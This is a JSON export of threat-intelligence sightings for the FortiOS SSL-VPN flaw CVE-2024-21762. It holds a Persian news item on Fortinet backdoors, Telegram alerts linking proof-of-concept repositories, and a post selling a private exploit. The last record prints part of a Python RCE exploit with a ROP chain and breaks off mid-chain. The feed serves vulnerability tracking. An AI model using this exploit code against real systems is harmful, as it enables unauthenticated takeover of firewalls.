\u0642\u0631\u0627\u0631 \u06af\u0631\u0641\u062a\u0647\u200c\u0627\u0646\u062f \u0627\u0637\u0644\u0627\u0639 \u062f\u0627\u062f\u0647 \u0627\u0633\u062a.\n\n\u0628\u0647 \u0639\u0646\u0648\u0627\u0646 \u06a9\u0627\u0647\u0634 \u0628\u06cc\u0634\u062a\u0631 \u0628\u0631\u0627\u06cc \u062c\u0644\u0648\u06af\u06cc\u0631\u06cc \u0627\u0632 \u062a\u06a9\u0631\u0627\u0631 \u0686\u0646\u06cc\u0646 \u0645\u0634\u06a9\u0644\u0627\u062a\u06cc\u060c \u06cc\u06a9 \u0633\u0631\u06cc \u0628\u0647 \u0631\u0648\u0632 \u0631\u0633\u0627\u0646\u06cc \u0646\u0631\u0645 \u0627\u0641\u0632\u0627\u0631 \u0628\u0631\u0627\u06cc FortiOS \u0627\u0631\u0627\u0626\u0647 \u0634\u062f\u0647 \u0627\u0633\u062a -\n\nFortiOS 7.4\u060c 7.2\u060c 7.0 \u0648 6.4 - \u0633\u06cc\u0645\u0644\u06cc\u0646\u06a9 \u0628\u0647 \u0639\u0646\u0648\u0627\u0646 \u0645\u062e\u0631\u0628 \u0639\u0644\u0627\u0645\u062a \u06af\u0630\u0627\u0631\u06cc \u0634\u062f \u062a\u0627 \u0628\u0647 \u0637\u0648\u0631 \u062e\u0648\u062f\u06a9\u0627\u0631 \u062a\u0648\u0633\u0637 \u0645\u0648\u062a\u0648\u0631 \u0622\u0646\u062a\u06cc \u0648\u06cc\u0631\u0648\u0633 \u062d\u0630\u0641 \u0634\u0648\u062f.\nFortiOS 7.6.2\u060c 7.4.7\u060c 7.2.11\u060c 7.0.17\u060c \u0648 6.4.16 - \u067e\u06cc\u0648\u0646\u062f \u0646\u0645\u0627\u062f\u06cc\u0646 \u062d\u0630\u0641 \u0634\u062f \u0648 \u0631\u0627\u0628\u0637 \u06a9\u0627\u0631\u0628\u0631\u06cc SSL-VPN \u0628\u0631\u0627\u06cc \u062c\u0644\u0648\u06af\u06cc\u0631\u06cc \u0627\u0632 \u0627\u0631\u0627\u0626\u0647 \u0686\u0646\u06cc\u0646 \u067e\u06cc\u0648\u0646\u062f\u0647\u0627\u06cc \u0646\u0645\u0627\u062f\u06cc\u0646 \u0645\u062e\u0631\u0628 \u0627\u0635\u0644\u0627\u062d \u0634\u062f\u0647 \u0627\u0633\u062a.\n\u0628\u0647 \u0645\u0634\u062a\u0631\u06cc\u0627\u0646 \u062a\u0648\u0635\u06cc\u0647 \u0645\u06cc\u200c\u0634\u0648\u062f \u0646\u0645\u0648\u0646\u0647\u200c\u0647\u0627\u06cc \u062e\u0648\u062f \u0631\u0627 \u0628\u0647 \u0646\u0633\u062e\u0647\u200c\u0647\u0627\u06cc 7.6.2\u060c 7.4.7\u060c 7.2.11\u060c 7.0.17 \u06cc\u0627 6.4.16 FortiOS \u0628\u0647\u200c\u0631\u0648\u0632\u0631\u0633\u0627\u0646\u06cc \u06a9\u0646\u0646\u062f\u060c \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc\u200c\u0647\u0627\u06cc \u062f\u0633\u062a\u06af\u0627\u0647 \u0631\u0627 \u0628\u0631\u0631\u0633\u06cc \u06a9\u0646\u0646\u062f\u060c \u0648 \u0647\u0645\u0647 \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc\u200c\u0647\u0627 \u0631\u0627 \u0628\u0647\u200c\u0639\u0646\u0648\u0627\u0646 \u062f\u0631 \u0645\u0639\u0631\u0636 \u062e\u0637\u0631 \u0642\u0631\u0627\u0631 \u062f\u0647\u0646\u062f \u0648 \u0645\u0631\u0627\u062d\u0644 \u0628\u0627\u0632\u06cc\u0627\u0628\u06cc \u0645\u0646\u0627\u0633\u0628 \u0631\u0627 \u0627\u0646\u062c\u0627\u0645 \u062f\u0647\u0646\u062f .\n\n\u0622\u0698\u0627\u0646\u0633 \u0627\u0645\u0646\u06cc\u062a \u0633\u0627\u06cc\u0628\u0631\u06cc \u0648 \u0627\u0645\u0646\u06cc\u062a \u0632\u06cc\u0631\u0633\u0627\u062e\u062a \u0627\u06cc\u0627\u0644\u0627\u062a \u0645\u062a\u062d\u062f\u0647 (CISA) \u062a\u0648\u0635\u06cc\u0647\u200c\u0627\u06cc \u0627\u0632 \u062e\u0648\u062f \u0635\u0627\u062f\u0631 \u06a9\u0631\u062f\u0647 \u0648 \u0627\u0632 \u06a9\u0627\u0631\u0628\u0631\u0627\u0646 \u0645\u06cc\u200c\u062e\u0648\u0627\u0647\u062f \u0627\u0639\u062a\u0628\u0627\u0631\u0646\u0627\u0645\u0647\u200c\u0647\u0627\u06cc \u0627\u0641\u0634\u0627 \u0634\u062f\u0647 \u0631\u0627 \u0628\u0627\u0632\u0646\u0634\u0627\u0646\u06cc \u06a9\u0646\u0646\u062f \u0648 \u062a\u0627 \u0632\u0645\u0627\u0646\u06cc \u06a9\u0647 \u0648\u0635\u0644\u0647\u200c\u0647\u0627 \u0627\u0639\u0645\u0627\u0644 \u0634\u0648\u0646\u062f\u060c \u0639\u0645\u0644\u06a9\u0631\u062f SSL-VPN \u0631\u0627 \u063a\u06cc\u0631\u0641\u0639\u0627\u0644 \u06a9\u0646\u0646\u062f. \u062a\u06cc\u0645 \u0648\u0627\u06a9\u0646\u0634 \u0627\u0636\u0637\u0631\u0627\u0631\u06cc \u0631\u0627\u06cc\u0627\u0646\u0647 \u0627\u06cc \u0641\u0631\u0627\u0646\u0633\u0647 (CERT-FR)\u060c \u062f\u0631 \u0628\u0648\u0644\u062a\u0646 \u0645\u0634\u0627\u0628\u0647\u06cc\u060c \u06af\u0641\u062a \u06a9\u0647 \u0627\u0632 \u0645\u0635\u0627\u0644\u062d\u0647 \u0647\u0627\u06cc\u06cc \u06a9\u0647 \u0628\u0647 \u0627\u0648\u0627\u06cc\u0644 \u0633\u0627\u0644 2023 \u0628\u0627\u0632\u0645\u06cc \u06af\u0631\u062f\u062f\u060c \u0622\u06af\u0627\u0647 \u0627\u0633\u062a.\n\n\n\u0628\u0646\u062c\u0627\u0645\u06cc\u0646 \u0647\u0631\u06cc\u0633\u060c \u0645\u062f\u06cc\u0631\u0639\u0627\u0645\u0644 watchTowr \u062f\u0631 \u0628\u06cc\u0627\u0646\u06cc\u0647\u200c\u0627\u06cc  \u06af\u0641\u062a \u06a9\u0647 \u0627\u06cc\u0646 \u062d\u0627\u062f\u062b\u0647 \u0628\u0647 \u062f\u0648 \u062f\u0644\u06cc\u0644 \u0645\u0647\u0645 \u0628\u0627\u0639\u062b \u0646\u06af\u0631\u0627\u0646\u06cc \u0627\u0633\u062a.\n\n\u0647\u0631\u06cc\u0633 \u06af\u0641\u062a: \u00ab\u0627\u0648\u0644\u060c \u062f\u0631 \u0637\u0628\u06cc\u0639\u062a \u0627\u0633\u062a\u062b\u0645\u0627\u0631 \u0628\u0633\u06cc\u0627\u0631 \u0633\u0631\u06cc\u0639\u062a\u0631 \u0627\u0632 \u0622\u0646 \u0686\u06cc\u0632\u06cc \u0627\u0633\u062a \u06a9\u0647 \u0633\u0627\u0632\u0645\u0627\u0646 \u0647\u0627 \u0645\u06cc \u062a\u0648\u0627\u0646\u0646\u062f \u0627\u0635\u0644\u0627\u062d \u06a9\u0646\u0646\u062f. \u0645\u0647\u0645\u062a\u0631 \u0627\u0632 \u0622\u0646\u060c \u0645\u0647\u0627\u062c\u0645\u0627\u0646 \u0628\u0647 \u0648\u0636\u0648\u062d \u0648 \u0639\u0645\u06cc\u0642\u0627\u064b \u0627\u0632 \u0627\u06cc\u0646 \u0648\u0627\u0642\u0639\u06cc\u062a \u0622\u06af\u0627\u0647 \u0647\u0633\u062a\u0646\u062f.\u00bb\n\n\u062f\u0648\u0645 \u0648 \u0648\u062d\u0634\u062a\u0646\u0627\u06a9\u200c\u062a\u0631\u060c \u0628\u0627\u0631\u0647\u0627 \u062f\u06cc\u062f\u0647\u200c\u0627\u06cc\u0645 \u06a9\u0647 \u0645\u0647\u0627\u062c\u0645\u0627\u0646 \u067e\u0633 \u0627\u0632 \u0628\u0647\u0631\u0647\u200c\u0628\u0631\u062f\u0627\u0631\u06cc \u0633\u0631\u06cc\u0639\u060c \u0642\u0627\u0628\u0644\u06cc\u062a\u200c\u0647\u0627 \u0648 \u062f\u0631\u0647\u0627\u06cc \u067e\u0634\u062a\u06cc \u0631\u0627 \u0628\u0647 \u06a9\u0627\u0631 \u0645\u06cc\u200c\u06af\u06cc\u0631\u0646\u062f \u06a9\u0647 \u0628\u0631\u0627\u06cc \u0632\u0646\u062f\u0647 \u0645\u0627\u0646\u062f\u0646 \u0627\u0632 \u0641\u0631\u0622\u06cc\u0646\u062f\u0647\u0627\u06cc \u0648\u0635\u0644\u0647\u200c\u0633\u0627\u0632\u06cc\u060c \u0627\u0631\u062a\u0642\u0627 \u0648 \u0628\u0627\u0632\u0646\u0634\u0627\u0646\u06cc \u06a9\u0627\u0631\u062e\u0627\u0646\u0647\u200c\u0627\u06cc \u0637\u0631\u0627\u062d\u06cc \u0634\u062f\u0647\u200c\u0627\u0646\u062f \u06a9\u0647 \u0633\u0627\u0632\u0645\u0627\u0646\u200c\u0647\u0627 \u0628\u0631\u0627\u06cc \u06a9\u0627\u0647\u0634 \u0627\u06cc\u0646 \u0645\u0648\u0642\u0639\u06cc\u062a\u200c\u0647\u0627 \u0628\u0631\u0627\u06cc \u062d\u0641\u0638 \u067e\u0627\u06cc\u062f\u0627\u0631\u06cc \u0648 \u062f\u0633\u062a\u0631\u0633\u06cc \u0628\u0647 \u0633\u0627\u0632\u0645\u0627\u0646\u200c\u0647\u0627\u06cc \u062f\u0631 \u0645\u0639\u0631\u0636 \u062e\u0637\u0631 \u062a\u06a9\u06cc\u0647 \u06a9\u0631\u062f\u0647\u200c\u0627\u0646\u062f.\u00bb\n\n\u0647\u0631\u06cc\u0633 \u0647\u0645\u0686\u0646\u06cc\u0646 \u06af\u0641\u062a \u06a9\u0647 \u0627\u0633\u062a\u0642\u0631\u0627\u0631 \u062f\u0631\u0628\u200c\u0647\u0627\u06cc \u067e\u0634\u062a\u06cc \u062f\u0631 \u0633\u0631\u0627\u0633\u0631 \u067e\u0627\u06cc\u06af\u0627\u0647 \u0645\u0634\u062a\u0631\u06cc WatchTowr \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0634\u062f\u0647\u200c\u0627\u0646\u062f\u060c \u0648 \u0622\u0646\u0647\u0627 \"\u062a\u0623\u062b\u06cc\u0631\u06cc \u0631\u0627 \u062f\u0631 \u0633\u0627\u0632\u0645\u0627\u0646\u200c\u0647\u0627\u06cc\u06cc \u0645\u0634\u0627\u0647\u062f\u0647 \u0645\u06cc\u200c\u06a9\u0646\u0646\u062f \u06a9\u0647 \u0628\u0633\u06cc\u0627\u0631\u06cc \u0628\u0647 \u0648\u0636\u0648\u062d \u0622\u0646 \u0631\u0627 \u0632\u06cc\u0631\u0633\u0627\u062e\u062a \u062d\u06cc\u0627\u062a\u06cc \u0645\u06cc\u200c\u0646\u0627\u0645\u0646\u062f.\"\n\n\u0628\u0646\u06cc\u0627\u062f Shadowserver \u0641\u0627\u0634 \u06a9\u0631\u062f\u0647 \u0627\u0633\u062a \u06a9\u0647 16620 \u062f\u0633\u062a\u06af\u0627\u0647 Fortinet \u062f\u0631 \u0645\u0639\u0631\u0636 \u0627\u06cc\u0646\u062a\u0631\u0646\u062a \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0634\u062f\u0647\u200c\u0627\u0646\u062f \u06a9\u0647 \u0628\u0627 \u062f\u0631\u067e\u0634\u062a\u06cc \u067e\u06cc\u0648\u0646\u062f \u0646\u0645\u0627\u062f\u06cc\u0646 \u06a9\u0647 \u0628\u0647 \u0639\u0648\u0627\u0645\u0644 \u062a\u0647\u062f\u06cc\u062f \u062f\u0633\u062a\u0631\u0633\u06cc \u0641\u0642\u0637 \u062e\u0648\u0627\u0646\u062f\u0646\u06cc \u0628\u0647 \u0641\u0627\u06cc\u0644\u200c\u0647\u0627\u06cc \u062d\u0633\u0627\u0633 \u062f\u0631 \u062f\u0633\u062a\u06af\u0627\u0647\u200c\u0647\u0627\u06cc\u06cc \u06a9\u0647 \u0642\u0628\u0644\u0627\u064b \u0646\u0642\u0636 \u0634\u062f\u0647 \u0627\u0645\u0627 \u06a9\u0627\u0645\u0644\u0627\u064b \u0648\u0635\u0644\u0647 \u0634\u062f\u0647\u200c\u0627\u0646\u062f\u060c \u0645\u06cc\u200c\u062f\u0647\u062f \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0634\u062f\u0647\u200c\u0627\u0646\u062f.\n\n\u0627\u0632 15 \u0622\u0648\u0631\u06cc\u0644 2025\u060c 7886 \u0645\u0648\u0631\u062f \u0622\u0633\u06cc\u0628 \u062f\u06cc\u062f\u0647 \u062f\u0631 \u0622\u0633\u06cc\u0627 \u0648\u0627\u0642\u0639 \u0634\u062f\u0647 \u0627\u0633\u062a\u060c \u067e\u0633 \u0627\u0632 \u0622\u0646 \u0627\u0631\u0648\u067e\u0627 (3766)\u060c \u0622\u0645\u0631\u06cc\u06a9\u0627\u06cc \u0634\u0645\u0627\u0644\u06cc (3217)\u060c \u0622\u0645\u0631\u06cc\u06a9\u0627\u06cc \u062c\u0646\u0648\u0628\u06cc (1054)\u060c \u0622\u0641\u0631\u06cc\u0642\u0627 (399) \u0648 \u0627\u0642\u06cc\u0627\u0646\u0648\u0633\u06cc\u0647 (298).\n\n\ud83c\udfed \u0648\u0628\u0633\u0627\u06cc\u062a \u0648 \u06a9\u0627\u0646\u0627\u0644 \u062a\u062e\u0635\u0635\u06cc \u0627\u0645\u0646\u06cc\u062a \u0632\u06cc\u0631\u0633\u0627\u062e\u062a\u0647\u0627\u06cc \u0627\u062a\u0648\u0645\u0627\u0633\u06cc\u0648\u0646 \u0648 \u06a9\u0646\u062a\u0631\u0644 \u0635\u0646\u0639\u062a\u06cc\n\ud83d\udc6e\ud83c\udffd\u200d\u2640\ufe0f\u0647\u0631\u06af\u0648\u0646\u0647 \u0627\u0646\u062a\u0634\u0627\u0631 \u0648 \u0630\u06a9\u0631 \u0645\u0637\u0627\u0644\u0628 \u0628\u062f\u0648\u0646 \u0630\u06a9\u0631 \u062f\u0642\u06cc\u0642 \u0645\u0646\u0628\u0639 \u0648 \u0622\u062f\u0631\u0633 \u0644\u06cc\u0646\u06a9 \u0622\u0646 \u0645\u0645\u0646\u0648\u0639 \u0627\u0633\u062a. \n\u0627\u062f\u0645\u06cc\u0646:\n\u200fhttps://t.me/pedram_kiani\n\u06a9\u0627\u0646\u0627\u0644 \u062a\u0644\u06af\u0631\u0627\u0645:\nhttps://t.me/ics_cert\n\u06af\u0631\u0648\u0647 \u0648\u0627\u062a\u0633 \u0622\u067e :\nhttps://chat.whatsapp.com/FpB620AWEeSKvd8U6cFh33\n\u06af\u0631\u0648\u0647 \u062a\u0644\u06af\u0631\u0627\u0645:\nhttps://t.me/ICSCERT_IR", "creation_timestamp": "2025-04-25T20:20:37.000000Z"}, {"uuid": "a845b23d-d2eb-4fc7-b46d-9a932c22813d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/6705", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aSafely detect whether a FortiGate SSL VPN is vulnerable to CVE-2024-21762\nURL\uff1ahttps://github.com/BishopFox/cve-2024-21762-check\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-03-01T20:06:13.000000Z"}, {"uuid": "acd3e4b2-61f7-4ac6-b2b4-20b6b63be348", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/6735", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aproof-of-concept out-of-bound write vuln in FortiOS ---> RCE\nURL\uff1ahttps://github.com/c0d3b3af/CVE-2024-21762-Exploit\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-03-06T21:46:14.000000Z"}, {"uuid": "73b634fa-35bf-41ab-aa94-2c82fdd0a5d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/6749", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aReal proof-of-concept out-of-bound write vuln in FortiOS ---> RCE \nURL\uff1ahttps://github.com/RequestXss/CVE-2024-21762-Exploit-POC\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-03-07T22:53:23.000000Z"}, {"uuid": "b412236b-11ce-4393-968d-f68bafa1ee56", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/6848", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aChequea si tu firewall es vulnerable a CVE-2024-21762 (RCE sin autenticaci\u00f3n)\nURL\uff1ahttps://github.com/r4p3c4/CVE-2024-21762-Exploit-PoC-Fortinet-SSL-VPN-Check\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-03-24T22:03:58.000000Z"}, {"uuid": "c09a80b9-7b21-4daa-97f1-b83944a8376b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/6861", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-21762-POC replayse published\nURL\uff1ahttps://github.com/S0SkiPlosK1/CVE-2024-21762-POC\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-03-27T05:39:59.000000Z"}, {"uuid": "ade40f21-9c0a-49f4-b13e-413e287760c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/6688", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aFortiOS 6.0 - 7.4.2 Out of bound exploit --> RCE!!!\nURL\uff1ahttps://github.com/c0d3b3af/CVE-2024-21762-POC\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2024-02-28T20:49:34.000000Z"}, {"uuid": "188f2f8d-e9f7-4d71-adf3-323173c78e36", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/9159", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-21762 \u662f Fortinet \u516c\u53f8\u7684 FortiOS \u548c FortiProxy \u4ea7\u54c1\u4e2d\u7684\u4e00\u4e2a\u4e25\u91cd\u6f0f\u6d1e\uff0c\u5b58\u5728\u4e8e\u5176 SSL VPN \u7ec4\u4ef6\u4e2d\u3002\nURL\uff1ahttps://github.com/XiaomingX/cve-2024-21762-poc\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-11-24T07:24:10.000000Z"}, {"uuid": "508e3203-fddd-4d00-884a-3306490b78b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/6704", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-21762 proof of concept is an exploitation out of bound write vulnerability in fortinet SSL VPN which leads to unauthenticated RCE if successfully explited.\nURL\uff1ahttps://github.com/tr1pl3ight/CVE-2024-21762-POC\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-03-01T20:01:20.000000Z"}, {"uuid": "4e26238c-1d19-4422-ae8f-b12a3e95c2bf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/6699", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-21762/FG-IR-24-015 exp\nURL\uff1ahttps://github.com/latrinacardinalfx/CVE-2024-21762-FG-IR-24-015-exp\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-03-01T10:08:11.000000Z"}, {"uuid": "b88fff69-6a09-40ec-b770-226a5500a451", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/6781", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aRCE exploit for FortiOS 6.0-7.4.2\nURL\uff1ahttps://github.com/cleverg0d/CVE-2024-21762-Checker\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-03-11T12:32:12.000000Z"}, {"uuid": "1a60442b-3507-4e32-9b53-6bd50c5575b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/6841", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aout-of-bounds write in Fortinet FortiOS CVE-2024-21762 vulnerability\nURL\uff1ahttps://github.com/AlestorExploiter/CVE-2024-21762-Exploit\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-03-24T04:09:44.000000Z"}, {"uuid": "0c3008b5-3224-4025-965a-3630943bcf22", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "published-proof-of-concept", "source": "Telegram/P054ImMwjqD_rl7lBAm-hCz5MlTq06QbnDeiIVFMTFFsHy4", "content": "", "creation_timestamp": "2025-05-04T05:11:16.000000Z"}, {"uuid": "6d555a7a-9c7b-4561-b48f-06446ea0cf70", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "published-proof-of-concept", "source": "https://t.me/orderofsixangles/2220", "content": "FortiGate SSLVPN CVE-2024-21762\u6f0f\u6d1e\u5229\u7528\u5206\u6790 \n\nhttps://mp.weixin.qq.com/s?__biz=Mzk0OTU2ODQ4Mw==&mid=2247484811&idx=1&sn=2e0407a32ba0c2925d6d857f4cdf7cbb&chksm=c3571307f4209a110d6b28cea9fe59ac0f0a2079c998a682e919860f397ea647fa0794933906&mpshare=1&scene=1&srcid=0313EaETjGzEAvOdByUt6ovU&sharer_shareinfo=1fce317285bafe87be6a66e8b64ed02b&sharer_shareinfo_first=1fce317285bafe87be6a66e8b64ed02b#rd", "creation_timestamp": "2024-03-13T12:41:57.000000Z"}, {"uuid": "75c63e13-5378-4956-9d69-5047c340b14f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "published-proof-of-concept", "source": "https://t.me/Hunt3rkill3rs1/6", "content": "Cve-2024-21762 private exploit for sale.\n2 type of payloads.\nWe accept escrow.\nPrice: $20k", "creation_timestamp": "2024-04-22T05:53:37.000000Z"}, {"uuid": "51b26fbf-6461-4840-aeef-226b3ce845f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "published-proof-of-concept", "source": "https://t.me/poxek/4184", "content": "Fortinet FortiOS & FortiProxy Unauthorized RCE CVE-2024-21762\n#RCE #CVE #Fortinet #FortiOS #FortiProxy\n\nCVE-2024-21762 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0441\u043e\u0431\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0437\u0430\u043f\u0438\u0441\u0438 \u0437\u0430 \u0433\u0440\u0430\u043d\u0438\u0446\u044b \u0431\u0443\u0444\u0435\u0440\u0430 (buffer overflow) \u0432 Fortinet FortiOS \u0438 FortiProxy. \u042d\u0442\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043d\u0435\u0430\u0432\u0442\u043e\u0440\u0438\u0437\u043e\u0432\u0430\u043d\u043d\u043e\u043c\u0443 \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0435\u043c\u0443 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0441\u0444\u043e\u0440\u043c\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 HTTP-\u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432.\n\n\u27a1\ufe0f\u0410\u0442\u0430\u043a\u0443\u0435\u043c\u044b\u0435 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u044b:\n- FortiOS\n- FortiProxy\n\n\u042d\u043a\u0441\u043f\u043b\u043e\u0439\u0442:\nimport socket\nimport time\nimport argparse\n\n\nTARGET = 'xxxxxxxxxxxx'  # Target IP\nPORT = 443  # Target port, usually 443 for SSL VPN\n\ndef make_sock(target, port):\n    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    sock.connect((target, port))\n    return sock\n\ndef send_payload(payload, target, port):\n    with make_sock(target, port) as ssock:\n        ssock.sendall(payload)\n\ndef main():\n    ssl_do_handshake_ptr = b\"%60%ce%42%00%00%00%00%00\"\n    getcwd_ptr = b\"%70%62%2c%04%00%00%00%00\"\n\n    pivot_1 = b\"%52%f7%fd%00%00%00%00%00\" # push rdi; pop rsp; ret;\n    pivot_2 = b\"%ac%c9%ab%02%00%00%00%00\" # add rsp, 0x2a0; pop rbx; pop r12; pop rbp; ret;\n\n    rop  = b\"\"\n    rop += b\"%c6%e2%46%00%00%00%00%00\" # push rdi; pop rax; ret;\n    rop += b\"%19%6f%4d%01%00%00%00%00\" # sub rax, 0x2c8; ret;\n    rop += b\"%8e%b2%fe%01%00%00%00%00\" # add rax, 0x10; ret;\n    rop += b\"%63%db%ae%02%00%00%00%00\" # pop rcx; ret;\n    rop += b\"%00%00%00%00%00%00%00%00\" # zero rcx\n    rop += b\"%38%ad%98%02%00%00%00%00\" # or rcx, rax; setne al; movzx eax, al; ret;\n\n    rop += b\"%c6%52%86%02%00%00%00%00\" # shl rax, 4; add rax, rdx; ret;\n    rop += b\"%6e%d0%3f%01%00%00%00%00\" # or rdx, rcx; ret; - rdx is zero so this is a copy\n    rop += b\"%a4%df%98%02%00%00%00%00\" # sub rdx, rax; mov rax, rdx; ret;\n\n    rop += b\"%f5%2c%e6%00%00%00%00%00\" #  sub rax, 0x10; ret;\n    rop += b\"%e4%e6%d7%01%00%00%00%00\" #  add rsi, rax; mov [rdi+8], rsi; ret;\n\n    rop += b\"%10%1b%0a%01%00%00%00%00\" # push rax; pop rdi; add eax, 0x5d5c415b; ret;\n    rop += b\"%25%0f%8d%02%00%00%00%00\" # pop r8; ret; 0x028d0f25\n    rop += 